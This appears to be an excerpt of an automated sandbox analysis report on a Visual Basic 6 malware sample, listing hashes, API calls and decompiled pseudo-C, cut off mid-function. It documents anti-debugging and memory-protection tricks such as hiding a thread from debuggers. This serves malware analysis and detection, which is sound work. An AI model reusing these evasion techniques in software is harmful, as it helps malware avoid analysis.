                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 7f8f0bcffd8531ee9ca316d63b8e08ee558e297063b45f68671a29b3bcb70534
                                  • Instruction ID: 10827ff6a520956398fb61f78bf6ad8ed352de841a2778a47b4defaa9256db98
                                  • Opcode Fuzzy Hash: 7f8f0bcffd8531ee9ca316d63b8e08ee558e297063b45f68671a29b3bcb70534
                                  • Instruction Fuzzy Hash: C7E04F80A4498783FE04845164026E5271042473A1F76CBB28C1F06ED9F04D893F6AE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228494D, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,022848AF,022849CB,022809BE), ref: 02284989
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: cfea15e5d34b1d27723b731975e4cf2f08aa7c700438b89f932c9e4d263e06bb
                                  • Instruction ID: 800591ae4ef2ce6514794f0fc682782484a9bedfd4618d9abee2ae4d4ac80065
                                  • Opcode Fuzzy Hash: cfea15e5d34b1d27723b731975e4cf2f08aa7c700438b89f932c9e4d263e06bb
                                  • Instruction Fuzzy Hash: B6E0D8A164468683FE14491160417C977116793350F36CBB6DC0F16E55B169443B9AE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287023, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: db5ffe3252300bd2fb24e7bb40230fad5b38262ee280bbd3587c4d587e50dec1
                                  • Instruction ID: 5cbe57439a10712917271e162e757a29e8fc4584b03ef0c5c39403bb6937a6ac
                                  • Opcode Fuzzy Hash: db5ffe3252300bd2fb24e7bb40230fad5b38262ee280bbd3587c4d587e50dec1
                                  • Instruction Fuzzy Hash: 90D0125C137305A9AA183AF14C94B7F95099E01A62B30862DBC07544CD9AE4C444C873
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02284941, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,022848AF,022849CB,022809BE), ref: 02284989
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 6ddf569032205c7d953a59423550f259a0b38fcbf4f9a950a3a1fef9fe071ee2
                                  • Instruction ID: 40cb07864175c6cc34176ae5c4c6fd3be1b0824142d90e9f5cbd43570d43b598
                                  • Opcode Fuzzy Hash: 6ddf569032205c7d953a59423550f259a0b38fcbf4f9a950a3a1fef9fe071ee2
                                  • Instruction Fuzzy Hash: 67D012317E9304BAFF7459704C5AF9962169B81F00F20441EB70B295C542F091A0C717
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228435E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 9c0ca5662b19ff9a8debac00735d02ef6c1170dfdf89563538e808b8be94454b
                                  • Instruction ID: adef7ed9b4cd2d5a47720e475b0fb060866e1b9659c539e5191cae55f8707a5c
                                  • Opcode Fuzzy Hash: 9c0ca5662b19ff9a8debac00735d02ef6c1170dfdf89563538e808b8be94454b
                                  • Instruction Fuzzy Hash: 80C02B1070620A81FF50B1341C107B925004B8132DF950320AC7F840C9C740C8C08302
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F1A, Relevance: 1.3, APIs: 1, Instructions: 98memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,0000E000,0000082A,FFFFFE2F), ref: 00403EB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 240bf746763ccdc19ae1bedc2617ebda381a004e0ce642aefce404381b332782
                                  • Instruction ID: f32d7bbc248160b40f3e3326b26dcf55666ba0d755e5c7160916856b6661c126
                                  • Opcode Fuzzy Hash: 240bf746763ccdc19ae1bedc2617ebda381a004e0ce642aefce404381b332782
                                  • Instruction Fuzzy Hash: 66216872616782AEFB266931C8D132E3BF6EB23340F304D7BD142D619AD32905C98726
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 02288323, Relevance: 2.9, Strings: 2, Instructions: 398COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .JtI$.JtI
                                  • API String ID: 0-1776623679
                                  • Opcode ID: a8b61fa225f77d1d66335e2e5017774148d28a5a0f1d95729022a57d24a1a912
                                  • Instruction ID: e0b53cb4906454b8788495e23bcb880e4e09ea2d3c13a8249715e3e20ac11fa1
                                  • Opcode Fuzzy Hash: a8b61fa225f77d1d66335e2e5017774148d28a5a0f1d95729022a57d24a1a912
                                  • Instruction Fuzzy Hash: 42D17D3463A34BCEDB34AEA885D47A577D29F52350FC88269D9968B2DED374C042C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022885C8, Relevance: 2.7, Strings: 2, Instructions: 214nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: 607a26742f773d962d3d9e2c2f56568c94241c65950b3d826ffb5375f3fbb3e1
                                  • Instruction ID: f4884f62d282c4706f16cf0b94baa27e2a75ad63ba5a7b2eb2a81fee00385e43
                                  • Opcode Fuzzy Hash: 607a26742f773d962d3d9e2c2f56568c94241c65950b3d826ffb5375f3fbb3e1
                                  • Instruction Fuzzy Hash: 39613A60565346CFDB20EF9484847A577D1AF16360F98C2AACC9A8B6DAD374C446C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02288603, Relevance: 2.7, Strings: 2, Instructions: 208nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: 772e5a5221080a3f40c494296b19ef46fd4debc6b70e22c03d54cd33dc99431e
                                  • Instruction ID: 002a17406427ca7df607f4d616089a0cdcc3b98bb35e33f65247614a12e479d3
                                  • Opcode Fuzzy Hash: 772e5a5221080a3f40c494296b19ef46fd4debc6b70e22c03d54cd33dc99431e
                                  • Instruction Fuzzy Hash: 48613770529346CEDB20EFA484947A577D1AF12360F88C2AACC9A8B2DAD374C446C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228868A, Relevance: 2.7, Strings: 2, Instructions: 204nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: ac2d85094477ecca23739b8499ec201fadfb242cba7a3aa7299dd9c3f7417dbe
                                  • Instruction ID: ad8b96cece1c975992173fb8848ab3448dd9ed903279cef1871b678b2aa0fc71
                                  • Opcode Fuzzy Hash: ac2d85094477ecca23739b8499ec201fadfb242cba7a3aa7299dd9c3f7417dbe
                                  • Instruction Fuzzy Hash: AD6148709253468FDB20EFA884C47A577D1AF12360F98C2AACC9A8B6DAD374C447C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02288633, Relevance: 2.7, Strings: 2, Instructions: 203nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: 9d541996975471397fda403b604e36e4e4d67e3605aebebb0c838ff70dafa04a
                                  • Instruction ID: 7a57449a8091a745eaa94588351d7d0f8f0e4f3a3e8c86a327907ab129fd1ae2
                                  • Opcode Fuzzy Hash: 9d541996975471397fda403b604e36e4e4d67e3605aebebb0c838ff70dafa04a
                                  • Instruction Fuzzy Hash: 04613770669346CEDB20EFA484D47A577D1AF12360F98C2AACC9A8B6DAD374C446C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228865F, Relevance: 2.7, Strings: 2, Instructions: 200nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: ef5ca29791b77056a9e0abed216aa58316d6cc25c892547bb496e0b6d354c93d
                                  • Instruction ID: ab830be61ee8de00120b170eb94729357a3a77be5c6ddfbcad33786c086d9254
                                  • Opcode Fuzzy Hash: ef5ca29791b77056a9e0abed216aa58316d6cc25c892547bb496e0b6d354c93d
                                  • Instruction Fuzzy Hash: 4C613970525346CFDB24EFA484D47A577D1AF12360F94C2A9CC9A8B6DAD374C446C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022886CA, Relevance: 2.7, Strings: 2, Instructions: 192nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI
                                  • API String ID: 675431017-1776623679
                                  • Opcode ID: 471e22400a9d2b120b3aeff0411e1cdaeaed24670e34c401f04fa24ac196b085
                                  • Instruction ID: e834dfb557df9c30e497e6e2fd538107a64c89c37ec41edca6ed8c1e6d8f0ba5
                                  • Opcode Fuzzy Hash: 471e22400a9d2b120b3aeff0411e1cdaeaed24670e34c401f04fa24ac196b085
                                  • Instruction Fuzzy Hash: EB5138705693478FDB20EFA884D47A577D1AF12360F88C2A9CC9A8B6DAD374C446C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228252E, Relevance: .5, Instructions: 476COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2907bf788b9ab9dd4788eaf1df23c1ec719d132a5d0d7782c8fd1c09b97b58a8
                                  • Instruction ID: 6ff2cbd5c5fbdbfc2a37762f6db532537d1db8a2a1361b0fab24161751e2bd8c
                                  • Opcode Fuzzy Hash: 2907bf788b9ab9dd4788eaf1df23c1ec719d132a5d0d7782c8fd1c09b97b58a8
                                  • Instruction Fuzzy Hash: 0FE15771762302EFD714AEA8CD90BE6B3A5BF05790F544329EC95932C8D774E885CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02283067, Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03cee9bcb585e88fb3519c1cf9f65e752d75c1ccd09e7e84d7622474fa55439a
                                  • Instruction ID: 478906979f9fb2e5cc798f5833b763e1103574815a18f0e034b385473fcf9d52
                                  • Opcode Fuzzy Hash: 03cee9bcb585e88fb3519c1cf9f65e752d75c1ccd09e7e84d7622474fa55439a
                                  • Instruction Fuzzy Hash: AB412470666346AFEB24BBA48C59BE973E2AF11B54FD54285EC065B0D9C3B4C8C4CB02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02282CED, Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56ab7ce68f6a683689945cb380a3ca15785880afaf9ea696dbe48a719848f842
                                  • Instruction ID: f2fd427dee6370045bba2d59996a0e4a5660ac82fb8805ef40d85a304b00e932
                                  • Opcode Fuzzy Hash: 56ab7ce68f6a683689945cb380a3ca15785880afaf9ea696dbe48a719848f842
                                  • Instruction Fuzzy Hash: 8E416C71661212DFCB11BEA88DA4BE573A5BF00790F514229ECD5A72C9DB64D88ACB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02282D18, Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f186972d5dc8453b1b2ea2931efb31ef846d5d26d6a84593aff99587c73c50fe
                                  • Instruction ID: cea562edfeacd9e147f4e559a7ae79005527e5e2472f68c0b01c1c53f9f9e92f
                                  • Opcode Fuzzy Hash: f186972d5dc8453b1b2ea2931efb31ef846d5d26d6a84593aff99587c73c50fe
                                  • Instruction Fuzzy Hash: F2418B71761212DFCB11BEA8CD64BE573A5BF00790F904329ECD5A72C9DB64E88ACB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022830CA, Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 622dd5e9cd23f994e4c72e5bf20dfee54fe44dabd48ae8eb3cc47d22164fb9e8
                                  • Instruction ID: ca1c833081bbdafed697f426b37bfa3efd3fddc1b3aab3564a00ab175a6d5412
                                  • Opcode Fuzzy Hash: 622dd5e9cd23f994e4c72e5bf20dfee54fe44dabd48ae8eb3cc47d22164fb9e8
                                  • Instruction Fuzzy Hash: 3B215F70665346DBEF24BB908C49FE93391AF01B50FD58251EC0A1B4ED93E8C887CA53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286E83, Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e701831eae13a460772fd248007e13f6bbd78bb7a1bbb3a5851a2153588281e
                                  • Instruction ID: f65786d6101e452572129e1ad9a2ad6af6d12e724014de27a7f5fb9c117e0db5
                                  • Opcode Fuzzy Hash: 2e701831eae13a460772fd248007e13f6bbd78bb7a1bbb3a5851a2153588281e
                                  • Instruction Fuzzy Hash: 5FF06591555A83C7DD04C4819081AE53760A2172B0F72DBF1CC0F57EA9F18DC83BA9D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287879, Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6f41b0d1efdc231e433e64651c52e0799f8a719da53510c54a6583a93646f6f
                                  • Instruction ID: a4374bb56cbf39bdae65ec29bdf22eb83b0e0456d98e84b20768884832064d58
                                  • Opcode Fuzzy Hash: d6f41b0d1efdc231e433e64651c52e0799f8a719da53510c54a6583a93646f6f
                                  • Instruction Fuzzy Hash: 6FF01C39326201CFD724EA68C1D8B75B3A5AB5C300BA54865D402876A9C324E880CA31
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022843B0, Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8021899157a890d91e5f880f9d24e2ff68df95eff6430b61df284a247b7c1377
                                  • Instruction ID: 9c3d5b790b6616a741eefe610c1b6d230aa18ef38a89268ae325e4183bd4eb75
                                  • Opcode Fuzzy Hash: 8021899157a890d91e5f880f9d24e2ff68df95eff6430b61df284a247b7c1377
                                  • Instruction Fuzzy Hash: 12C04CF62125C1CBEB55DA88D4C1B007371AB54548B550491E0128F655C355ED40CA00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289332, Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f500911b62df83f123e2a551ab30e4e4eae8731cede8876b1294bd34c0ef30db
                                  • Instruction ID: 2a86165755d540fc6d8e4da633f864383836b9e359e6392ac3071f420265d15c
                                  • Opcode Fuzzy Hash: f500911b62df83f123e2a551ab30e4e4eae8731cede8876b1294bd34c0ef30db
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411099, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E00411099(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v60;
				char _v68;
				signed int _v76;
				intOrPtr _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				char _v108;
				signed int _v112;
				signed int _v116;
				signed int _t52;
				char* _t56;
				signed int _t64;
				char* _t67;
				char* _t68;
				signed int _t71;
				intOrPtr _t87;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				_push(0x60);
				L004014F0();
				_v12 = _t87;
				_v8 = 0x401398;
				_v60 = 9;
				_v68 = 2;
				_t52 =  &_v68;
				_push(_t52);
				L004015CE();
				L0040161C();
				_push(_t52);
				_push(0x402c80);
				L00401694();
				asm("sbb eax, eax");
				_v88 =  ~( ~( ~_t52));
				L0040169A();
				L0040167C();
				_t56 = _v88;
				if(_t56 != 0) {
					_push(0);
					_push(L"x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92");
					_push( &_v40);
					_push( &_v68);
					L004015C8();
					if( *0x41333c != 0) {
						_v108 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v108 = 0x41333c;
					}
					_t15 =  &_v108; // 0x41333c
					_v88 =  *((intOrPtr*)( *_t15));
					_t64 =  *((intOrPtr*)( *_v88 + 0x1c))(_v88,  &_v48);
					asm("fclex");
					_v92 = _t64;
					if(_v92 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40275c);
						_push(_v88);
						_push(_v92);
						L004016B2();
						_v112 = _t64;
					}
					_v96 = _v48;
					_v76 = _v76 & 0x00000000;
					_v84 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t67 =  &_v68;
					L004015C2();
					_t68 =  &_v52;
					L00401652();
					_t71 =  *((intOrPtr*)( *_v96 + 0x58))(_v96, _t68, _t68, _t67, _t67, 0x402cd0, 0x10);
					asm("fclex");
					_v100 = _t71;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402c00);
						_push(_v96);
						_push(_v100);
						L004016B2();
						_v116 = _t71;
					}
					_push( &_v48);
					_t56 =  &_v52;
					_push(_t56);
					_push(2);
					L0040164C();
					L0040167C();
				}
				_push(0x41124f);
				L0040167C();
				return _t56;
			}



























                                  0x0041109e
                                  0x004110a9
                                  0x004110aa
                                  0x004110b1
                                  0x004110b4
                                  0x004110bc
                                  0x004110bf
                                  0x004110c6
                                  0x004110cd
                                  0x004110d4
                                  0x004110d7
                                  0x004110d8
                                  0x004110e2
                                  0x004110e7
                                  0x004110e8
                                  0x004110ed
                                  0x004110f4
                                  0x004110fa
                                  0x00411101
                                  0x00411109
                                  0x0041110e
                                  0x00411114
                                  0x0041111a
                                  0x0041111c
                                  0x00411124
                                  0x00411128
                                  0x00411129
                                  0x00411138
                                  0x00411152
                                  0x0041113a
                                  0x0041113a
                                  0x0041113f
                                  0x00411144
                                  0x00411149
                                  0x00411149
                                  0x00411159
                                  0x0041115e
                                  0x0041116d
                                  0x00411170
                                  0x00411172
                                  0x00411179
                                  0x00411192
                                  0x0041117b
                                  0x0041117b
                                  0x0041117d
                                  0x00411182
                                  0x00411185
                                  0x00411188
                                  0x0041118d
                                  0x0041118d
                                  0x00411199
                                  0x0041119c
                                  0x004111a0
                                  0x004111aa
                                  0x004111b4
                                  0x004111b5
                                  0x004111b6
                                  0x004111b7
                                  0x004111bd
                                  0x004111c1
                                  0x004111c7
                                  0x004111cb
                                  0x004111d9
                                  0x004111dc
                                  0x004111de
                                  0x004111e5
                                  0x004111fe
                                  0x004111e7
                                  0x004111e7
                                  0x004111e9
                                  0x004111ee
                                  0x004111f1
                                  0x004111f4
                                  0x004111f9
                                  0x004111f9
                                  0x00411205
                                  0x00411206
                                  0x00411209
                                  0x0041120a
                                  0x0041120c
                                  0x00411217
                                  0x00411217
                                  0x0041121c
                                  0x00411249
                                  0x0041124e

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004110B4
                                  • #574.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004110D8
                                  • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004110E2
                                  • __vbaStrCmp.MSVBVM60(00402C80,00000000,00000002), ref: 004110ED
                                  • __vbaFreeStr.MSVBVM60(00402C80,00000000,00000002), ref: 00411101
                                  • __vbaFreeVar.MSVBVM60(00402C80,00000000,00000002), ref: 00411109
                                  • __vbaVarLateMemCallLd.MSVBVM60(00000002,?,x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92,00000000,00402C80,00000000,00000002), ref: 00411129
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C), ref: 00411144
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000001C), ref: 00411188
                                  • __vbaChkstk.MSVBVM60(00000000,?,0040275C,0000001C), ref: 004111AA
                                  • __vbaCastObjVar.MSVBVM60(?,00402CD0), ref: 004111C1
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,00402CD0), ref: 004111CB
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000058), ref: 004111F4
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041120C
                                  • __vbaFreeVar.MSVBVM60 ref: 00411217
                                  • __vbaFreeVar.MSVBVM60(0041124F,00402C80,00000000,00000002), ref: 00411249
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#574CallCastLateListMoveNew2
                                  • String ID: <3A$x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92
                                  • API String ID: 889233846-2466621088
                                  • Opcode ID: ef0ed16c5dafe39cff4337814fc955967d67524d271a0ff91e6eee3af903072d
                                  • Instruction ID: 0a92d20b4b4c64783ac98bb16c986b59187ebcf50a41a48487acf98876746cde
                                  • Opcode Fuzzy Hash: ef0ed16c5dafe39cff4337814fc955967d67524d271a0ff91e6eee3af903072d
                                  • Instruction Fuzzy Hash: 73412971940208ABDB00EFE5CD46FDDB7B9AB08704F50442AE501BB2A1DB7959458B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041081E, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0041081E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v32;
				char _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				void* _v72;
				signed int _v76;
				char _v84;
				signed int _v88;
				signed int _t35;
				signed int _t39;
				char* _t42;
				intOrPtr _t61;

				_push(0x4014f6);
